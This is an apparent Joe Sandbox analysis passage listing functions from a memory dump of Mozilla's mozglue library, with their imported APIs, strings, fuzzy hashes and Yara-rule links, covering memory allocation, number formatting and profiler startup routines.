Opcode Fuzzy Hash: 782cba98f1fd2cf4816a2a7b47ff04d608eeb7286a6469011224e0f6e55a37a7
Instruction Fuzzy Hash: 4B5108B1A042158FEB10CF68D88076E73B2FF8D349F16446AD916ABB50E732F904CB95

Function 6C5C4DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C5C4E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C5C4E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5C4EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5C4F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C5C4F1E

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: 601dfcbc2dcf077442291a653e8ca372b30806d1a349b22207e5759126657155
Instruction ID: 6be4cd0dc52f321e40c28df5c7c27ce7b4093a5a1b8b34b4f657424f1ee08a0e
Opcode Fuzzy Hash: 601dfcbc2dcf077442291a653e8ca372b30806d1a349b22207e5759126657155
Instruction Fuzzy Hash: B341CF716047059FC705CFA9C880D6BBBE4BF8A344F108A2DF46687741D770E958CB92

Function 6C5D1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C5D152B,?,?,?,?,6C5D1248,?), ref: 6C5D159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C5D152B,?,?,?,?,6C5D1248,?), ref: 6C5D15BC
moz_xmalloc.MOZGLUE(-00000001,?,6C5D152B,?,?,?,?,6C5D1248,?), ref: 6C5D15E7
free.MOZGLUE(?,?,?,?,?,?,6C5D152B,?,?,?,?,6C5D1248,?), ref: 6C5D1606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C5D152B,?,?,?,?,6C5D1248,?), ref: 6C5D1637

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 301f2c45091f70b6f127bac6c57c3b172ef9a40aa4145edabfc707bb9a1ab02b
Instruction ID: ea3c87e106b52efb8932c47b90a2c8e3cf02fab15e58c978f63bcdfc6c409434
Opcode Fuzzy Hash: 301f2c45091f70b6f127bac6c57c3b172ef9a40aa4145edabfc707bb9a1ab02b
Instruction Fuzzy Hash: C731B571A002148BCB18CE7CDC5046F77A9AB853747260B69E427DBBD4EB30F9048799

Function 6C62AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C63E330,?,6C5EC059), ref: 6C62AD9D

Part of subcall function 6C5DCA10: malloc.MOZGLUE(?), ref: 6C5DCA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C63E330,?,6C5EC059), ref: 6C62ADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C63E330,?,6C5EC059), ref: 6C62AE01
GetLastError.KERNEL32(?,00000000,?,?,6C63E330,?,6C5EC059), ref: 6C62AE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C63E330,?,6C5EC059), ref: 6C62AE3D

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: 66fd9493b73fef52ebb5b3c31a4a6d671fa55ad6d56a7dd366dfaf5c51822eb6
Instruction ID: 41751c7401ecb2d36266814ee83f08059e6ec9f429272db75513c1e5b4f388e4
Opcode Fuzzy Hash: 66fd9493b73fef52ebb5b3c31a4a6d671fa55ad6d56a7dd366dfaf5c51822eb6
Instruction Fuzzy Hash: DF3143B19003159FDB10DF758C44AABB7F8EF89714F158829E85AD7700E774A805CBA8

Function 6C625EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C63DCA0,?,?,?,6C5FE8B5,00000000), ref: 6C625F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C5FE8B5,00000000), ref: 6C625F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C5FE8B5,00000000), ref: 6C625F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C5FE8B5,00000000), ref: 6C625F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C5FE8B5,00000000), ref: 6C625FD6

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: d0c2ebec64f8d3216511bc1599234c0e54edef047e18bcb541f456785dfeae86
Instruction ID: 4627eefa38198e8ab0d4c455cacc0b2f5eb0702b6a88a0c58497a27cf5b47fef
Opcode Fuzzy Hash: d0c2ebec64f8d3216511bc1599234c0e54edef047e18bcb541f456785dfeae86
Instruction Fuzzy Hash: 1B31C934300A008FD724DF29C8D8A6AB7F9BF89319FA48558E5568BB99C735EC41CF94

Function 6C5CB4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C5CB532
moz_xmalloc.MOZGLUE(?), ref: 6C5CB55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5CB56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C5CB57E
free.MOZGLUE(00000000), ref: 6C5CB58F

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 105945b913fb24082dcbc61b60f87cf07a4d71c53d550244d2540c594a299bc4
Instruction ID: 1cb3109b2fb7052d4671fa69d850a1f8efe7361b73bcbfc4d1a804cc92f35ae5
Opcode Fuzzy Hash: 105945b913fb24082dcbc61b60f87cf07a4d71c53d550244d2540c594a299bc4
Instruction Fuzzy Hash: EE21B971A002059BDB00DFA5CC40B6ABBB9FF85318F64416DE914DB341F775D915CBA2

Function 6C626E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C626E78

Part of subcall function 6C626A10: InitializeCriticalSection.KERNEL32(6C64F618), ref: 6C626A68
Part of subcall function 6C626A10: GetCurrentProcess.KERNEL32 ref: 6C626A7D
Part of subcall function 6C626A10: GetCurrentProcess.KERNEL32 ref: 6C626AA1
Part of subcall function 6C626A10: EnterCriticalSection.KERNEL32(6C64F618), ref: 6C626AAE
Part of subcall function 6C626A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C626AE1
Part of subcall function 6C626A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C626B15
Part of subcall function 6C626A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C626B65
Part of subcall function 6C626A10: LeaveCriticalSection.KERNEL32(6C64F618,?,?), ref: 6C626B83

MozFormatCodeAddress.MOZGLUE ref: 6C626EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C626EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C626EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C626EFF

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: 0ff555f0ac71d1c835a62f2ab512025c3aa7bdceb56954891e0a466993afeb8b
Instruction ID: 779bbe58266bdca92aaf7e99a179174c43cc0affd74dec199996279633437937
Opcode Fuzzy Hash: 0ff555f0ac71d1c835a62f2ab512025c3aa7bdceb56954891e0a466993afeb8b
Instruction Fuzzy Hash: EF21B0B1A0421A8FCF10DF29D8C569E77F5EF84308F048039E80D97240EB749A598F96

Function 6C600D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C5C3DEF), ref: 6C600D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C5C3DEF), ref: 6C600D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C5C3DEF), ref: 6C600DAF

Strings

<jemalloc>, xrefs: 6C600D92, 6C600DB9
: (malloc) Error in VirtualFree(), xrefs: 6C600D97, 6C600DBE

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 099c4191da5ef3e2cf950c4c535b65cb462e0cd697d7eae25b832234df36f4d0
Instruction ID: 091e2f8cb37f7c82ec7ed77d396a009379597004c00f5f8551dec656f7f63b12
Opcode Fuzzy Hash: 099c4191da5ef3e2cf950c4c535b65cb462e0cd697d7eae25b832234df36f4d0
Instruction Fuzzy Hash: D1F080313C079423D7582D665E06B6A379D67C2B55F34C035F604FADC0DAA0E400C67D

Function 6C617620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C6175C4,?), ref: 6C61762B

Part of subcall function 6C5DCA10: malloc.MOZGLUE(?), ref: 6C5DCA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C6174D7,6C6215FC,?,?,?), ref: 6C617644
GetCurrentThreadId.KERNEL32 ref: 6C61765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6174D7,6C6215FC,?,?,?), ref: 6C617663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6174D7,6C6215FC,?,?,?), ref: 6C617677

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: 0d891e73e6386eb1e628ec6dd9c2d17cf903fc433df08ed1737d73cec39d545d
Instruction ID: a198ff1556247dd7b30716fd8783c8ed0ee450216c1e2952227abdfd6df1263e
Opcode Fuzzy Hash: 0d891e73e6386eb1e628ec6dd9c2d17cf903fc433df08ed1737d73cec39d545d
Instruction Fuzzy Hash: 20F0C271E10B45ABD7009F32C888A7AB778FFEA299F128356F90443601E7B0B5D18BD0

Function 6C5ED468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C5FCBE8: GetCurrentProcess.KERNEL32(?,6C5C31A7), ref: 6C5FCBF1
Part of subcall function 6C5FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5C31A7), ref: 6C5FCBFA

EnterCriticalSection.KERNEL32(6C64E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5FD1C5), ref: 6C5ED4F2
LeaveCriticalSection.KERNEL32(6C64E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5FD1C5), ref: 6C5ED50B

Part of subcall function 6C5CCFE0: EnterCriticalSection.KERNEL32(6C64E784), ref: 6C5CCFF6
Part of subcall function 6C5CCFE0: LeaveCriticalSection.KERNEL32(6C64E784), ref: 6C5CD026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5FD1C5), ref: 6C5ED52E
EnterCriticalSection.KERNEL32(6C64E7DC), ref: 6C5ED690
LeaveCriticalSection.KERNEL32(6C64E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5FD1C5), ref: 6C5ED751

Strings

MOZ_CRASH(), xrefs: 6C5ED4BB

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 648b0c62094fff5cbba7bd47db1e0f0a3d6cee7ca5d2e2278e1026db14bc99b3
Instruction ID: 2b003cac30baf2af759a1fc2c1d4737b594f24eba15d151e9c9e47463cde73fe
Opcode Fuzzy Hash: 648b0c62094fff5cbba7bd47db1e0f0a3d6cee7ca5d2e2278e1026db14bc99b3
Instruction Fuzzy Hash: C951CF71A047018FD368DF29C89071AB7F2EBC9718F64C92ED5A9C7B85D770A804CB96

Function 6C614630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C614721

Strings

-%llu, xrefs: 6C614733
profiler-paused, xrefs: 6C6146E4
., xrefs: 6C61476A

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: 4e72869a43525046bc15929df4ff3922cb4989ce995fe95ff4f7e3c4e375f15b
Instruction ID: 5ccffa35aee49df5151fdba71889ba0c52248405241b6e87a957d8a09c64373a
Opcode Fuzzy Hash: 4e72869a43525046bc15929df4ff3922cb4989ce995fe95ff4f7e3c4e375f15b
Instruction Fuzzy Hash: 11414971A086049BCB08DF7DD89116EB7F5EF86748F10C63DE8595BB41EB7098048795

Function 6C6146E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C614721

Part of subcall function 6C5C4410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C603EBD,00000017,?,00000000,?,6C603EBD,?,?,6C5C42D2), ref: 6C5C4444

Strings

-%llu, xrefs: 6C614733
profiler-paused, xrefs: 6C6146E4
., xrefs: 6C61476A

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: ad9875ca6c944b5b89502b7abce35f0fbf53099b97fcc8a9ba828081582a450a
Instruction ID: 1bf1f99a2524b13bcb4bba384571099a1668b38775cade33a8fe308a6a67b1e8
Opcode Fuzzy Hash: ad9875ca6c944b5b89502b7abce35f0fbf53099b97fcc8a9ba828081582a450a
Instruction Fuzzy Hash: C4314B71F042088BCB0CDF6DD8816AEBBE6DBC9318F14853DE8059BB81EBB09C048B54

Function 6C61B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5C4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C603EBD,6C603EBD,00000000), ref: 6C5C42A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C61B127), ref: 6C61B463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C61B4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C61B4E4

Strings

pid:, xrefs: 6C61B4DE

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 056475ee1e46cf630c5762b3ea858c161773a69f09319e78b82c6fe18510892a
Instruction ID: 5e7cf097a0a002e2abfa3a39e0d3bb52978eb38f2e8194c9f80dcb3eea4e042f
Opcode Fuzzy Hash: 056475ee1e46cf630c5762b3ea858c161773a69f09319e78b82c6fe18510892a
Instruction Fuzzy Hash: F23115B1A05204DBDB00DFAED880AEEB7B5BF85309F54852DD811A7F41D731A845CBE9

Function 6C60E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C60E577
AcquireSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C60E584
ReleaseSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C60E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C60E8A6

Strings

MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C60E777
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C60E655
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C60E722, 6C60E750, 6C60E7A2
MOZ_PROFILER_STARTUP, xrefs: 6C60E5A1, 6C60E5CC, 6C60E5FF, 6C60E62A
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C60E826, 6C60E850

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: ac1043b68a0aa5a2ac136bc998b89ff7dc3a181d317cd440bd9878db5d7b710b
Instruction ID: b1812786e8330afccb0de9986eeb61bc59c9e8eeecfc30c09d23dc6f47af7841
Opcode Fuzzy Hash: ac1043b68a0aa5a2ac136bc998b89ff7dc3a181d317cd440bd9878db5d7b710b
Instruction Fuzzy Hash: CC118E31604654DFCB00AF16C888A6EBBB4FFC932CF44C619E89557651DB70A805CF9E

Function 6C610C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C610CD5

Part of subcall function 6C5FF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C5FF9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C610D40
free.MOZGLUE ref: 6C610DCB

Part of subcall function 6C5E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C5E5EDB
Part of subcall function 6C5E5E90: memset.VCRUNTIME140(ewbl,000000E5,?), ref: 6C5E5F27
Part of subcall function 6C5E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C5E5FB2

free.MOZGLUE ref: 6C610DDD
free.MOZGLUE ref: 6C610DF2

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: ac77be5b473a3899f8c55aa0eb7065d85dbe237a727c7665d457bcc214f54abd
Instruction ID: 019e8b1ac58f240c3db2e17b042c419f162f1689fb2b48aab57eea5fa92008ed
Opcode Fuzzy Hash: ac77be5b473a3899f8c55aa0eb7065d85dbe237a727c7665d457bcc214f54abd
Instruction Fuzzy Hash: 6041047191C7809BD720CF29C4807AAFBE5BFC9714F508A2EE8D887B50DB709855CB86

Function 6C61CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C60DA31,00100000,?,?,00000000,?), ref: 6C61CDA4

Part of subcall function 6C5DCA10: malloc.MOZGLUE(?), ref: 6C5DCA26

Part of subcall function 6C61D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C61CDBA,00100000,?,00000000,?,6C60DA31,00100000,?,?,00000000,?), ref: 6C61D158
Part of subcall function 6C61D130: InitializeConditionVariable.KERNEL32(00000098,?,6C61CDBA,00100000,?,00000000,?,6C60DA31,00100000,?,?,00000000,?), ref: 6C61D177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C60DA31,00100000,?,?,00000000,?), ref: 6C61CDC4

Part of subcall function 6C617480: ReleaseSRWLockExclusive.KERNEL32(?,6C6215FC,?,?,?,?,6C6215FC,?), ref: 6C6174EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C60DA31,00100000,?,?,00000000,?), ref: 6C61CECC

Part of subcall function 6C5DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C5DCAA2

